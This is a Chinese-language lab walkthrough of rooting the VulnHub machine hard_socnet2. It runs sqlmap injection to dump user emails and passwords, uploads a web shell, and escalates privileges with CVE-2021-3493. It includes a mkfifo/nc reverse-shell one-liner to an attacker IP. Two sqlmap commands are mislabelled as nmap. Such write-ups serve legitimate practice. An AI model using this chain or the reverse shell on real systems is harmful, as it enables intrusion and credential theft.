shanqueday5

靶机：https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
攻击机：kali2022.2
目标：root权限

信息收集

主机发现

arp-scan -l

得到靶机地址：10.0.3.10

端口扫描

全端口扫描

nmap -p- 10.0.3.10

开放
22
80
8000

服务探测

nmap -p22,80,8000 -sV 10.0.3.10

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)

web渗透

信息收集

访问80页面，发现要邮箱登陆，不考虑爆破。并且开放了注册

注册个账号进去看看

聊天框存在xss，但是不太可能利用得上毕竟只是打靶

通过发言可以收集到信息，有一个admin账号，一个testuser账号，并且admin说了一句它运行了一个moniter.py的脚本

搜索框发现单引号可以报错，是个mysql数据库，搜索的传参名：query

上burp抓包，然后生成一个shanque.txt把包粘贴放进去，sqlmap

sqlmap -r shanque.txt -p query
sqlmap -r shanque.txt -p query --dbs

其中socialnetwork应该就是刚刚我们80端口那个社交网站的库

nmap -r shanque.txt -p query -D socialnetwork --tables

查询users表的字段

nmap -r shanque.txt -p query -D socialnetwork -T users --columns

通过刚刚的信息收集知道，我们要的应该是邮箱和密码这两个内容

sqlmap -r shanque.txt -p query -D socialnetwork -T users -C user_password,user_email --dump

登陆admin账号，和普通用户比也没有别的功能，但是发现了一个文件上传点

上传shell，尝试连接

获得了一个蚁剑的shell，信息收集，提权

uname -a
lsb_release -a

可以使用去年爆出来的针对ubantu的漏洞提权，CVE-2021-3493,我放附件里了

把这个exploit.c传上去，然后gcc编译成可执行文件执行

gcc -o shanque exploit.c
chmod +x shanque

获得了一个#的命令行又退出了，应该是蚁剑的shell有问题，用nc弹一个到kali上来，不确定是否靶机的nc有-e参数除了前几次的用|连接以外，今天又学到个新方法

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.3.4 6666 >/tmp/f

确保shell能交互是操作，在用python来获取一个

python -c "import pty; pty.spawn('/bin/bash')"

提权成功

总结

主机发现
端口扫描、服务探测
sql注入拿管理员账号
文件上传getshell
蚁剑shell弹一个shell到kali，在用python做一个升级
漏洞利用
提权